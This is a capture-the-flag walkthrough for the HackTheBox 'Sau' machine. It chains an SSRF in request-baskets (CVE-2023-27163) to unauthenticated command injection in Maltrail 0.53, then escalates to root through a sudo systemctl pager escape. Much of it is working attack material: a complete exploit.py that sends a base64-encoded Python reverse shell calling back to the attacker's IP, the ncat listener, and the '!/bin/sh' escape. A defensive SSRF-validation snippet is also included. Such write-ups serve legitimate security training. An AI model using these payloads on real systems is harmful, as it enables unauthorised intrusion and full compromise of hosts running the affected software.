HackTheBox: Sau


Topic

Lab

HackTheBox:

https://app.hackthebox.com/machines/Sau

Initial Enumeration

● Start Machine

Solution

1. nmap scan

nmap -sC -sV -T4 10.10.11.224

2. Browse http://10.10.11.224:55555/web

3. Create a new basket

http://10.10.11.224:55555/web/chwtest

4. Curl http://10.10.11.224:55555/web/chwtest

5. Attempt basket response

5.1 Curl http://10.10.11.224:55555/web/chwtest

6. CVE-2023-27163

National Vulnerability Database (NVD) entry for CVE-2023-27163

6.1 Attempt curl

curl --location 'http://10.10.11.224:55555/api/baskets/chwtest2' --header 'Content-Type: application/json' --data '{"forward_url": "http://127.0.0.1:80/", "proxy_response": true, "insecure_tls": false, "expand_path": true, "capacity": 250}'

(web)

Powered by Mailtrail (v0.53)
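The curl request above points a basket's forward_url at 127.0.0.1 and has the basket proxy the response back, which is what CVE-2023-27163 allows. As an added example (not request-baskets' own code), this is the kind of forward-target check that closes that hole: it rejects loopback, private, link-local and unspecified addresses, unwraps IPv4-mapped IPv6 literals, and refuses names it cannot resolve. The resolver parameter is an assumption so the check can be exercised offline.

```python
import ipaddress
import socket
from urllib.parse import urlsplit


def _system_resolve(host):
    # Default resolver: every address the OS returns for the name.
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def forward_url_is_safe(url, resolver=_system_resolve):
    """Return True only if url is an acceptable basket forward target."""
    parts = urlsplit(url)
    host = parts.hostname
    if parts.scheme not in ("http", "https") or not host:
        return False
    # "localhost" and *.localhost never leave the box, so refuse them outright.
    if host.lower() == "localhost" or host.lower().endswith(".localhost"):
        return False
    try:
        # Literal address in the URL (urlsplit strips the [] around IPv6).
        addrs = {ipaddress.ip_address(host)}
    except ValueError:
        # Hostname: resolve it and check every address it maps to.
        try:
            addrs = {ipaddress.ip_address(a) for a in resolver(host)}
        except (OSError, ValueError):
            return False
    if not addrs:
        return False
    for addr in addrs:
        # ::ffff:127.0.0.1 is loopback in disguise; check the embedded IPv4.
        if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped:
            addr = addr.ipv4_mapped
        if (addr.is_loopback or addr.is_private or addr.is_link_local
                or addr.is_reserved or addr.is_multicast or addr.is_unspecified):
            return False
    return True
```

Validating at configuration time is not enough on its own: the name can resolve differently when the forward actually happens (DNS rebinding), so a production control should also check the peer address of the socket it connects.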

7. Command Injection

Unauthenticated OS Command Injection in stamparm/maltrail

7.1 create exploit.py

#!/usr/bin/env python3

import sys
import os
import base64

print("\n[+]Started MailTrail version 0.53 Exploit")

# Fail-safe for arguments: check the count before reading sys.argv,
# otherwise a missing argument raises IndexError before the usage message
if len(sys.argv) != 4:
    print("Usage: python3 mailtrail.py <your ip> <your port> <target url>")
    sys.exit(-1)

# Arguments to be passed
YOUR_IP = sys.argv[1]  # <your ip>
YOUR_PORT = sys.argv[2]  # <your port>
TARGET_URL = sys.argv[3]  # <target url>


# Exploit the vulnerability
def exploit(my_ip, my_port, target_url):
    # Defining python3 reverse shell payload
    payload = f'python3 -c \'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{my_ip}",{my_port}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")\''
    # Encoding the payload with base64 encoding
    encoded_payload = base64.b64encode(payload.encode()).decode()
    # curl command that is to be executed on our system to exploit mailtrail
    command = f"curl '{target_url}/login' --data 'username=;`echo+\"{encoded_payload}\"+|+base64+-d+|+sh`'"
    # Executing it
    os.system(command)


print("\n[+]Exploiting MailTrail on {}".format(str(TARGET_URL)))
try:
    exploit(YOUR_IP, YOUR_PORT, TARGET_URL)
    print("\n[+] Successfully Exploited")
    print("\n[+] Check your Reverse Shell Listener")
except Exception as exc:
    print("\n[!] An Error has occurred. Try again! ({})".format(exc))

7.2 Create ncat listener (same port passed to exploit.py)

ncat -nvlp 9876

7.3 Execute exploit.py

python3 exploit.py 10.10.14.70 9876 http://10.10.11.224:55555/chwtest2

(ncat)

7.4 Find user flag

$ id
uid=1001(puma) gid=1001(puma) groups=1001(puma)
$ whoami
puma

$ cd ~
$ ls
user.txt

8. Get User Flag

user flag:

108552a4226f9a311*************

9. Privilege Escalation

ls -al

sudo -l

less interface (the systemctl output is shown through the pager)

sudo systemctl status trail.service

(press RETURN at the pager prompt, then type the pager command)

!/bin/sh

9.1 Check privilege & Find root flag

$ whoami
root

$ cd ~
$ ls
go  root.txt

10. Get Root Flag

root flag:

d87bc7e22d1ea5b307************

tags: Web CTF ncat Privilege Escalation exploit.py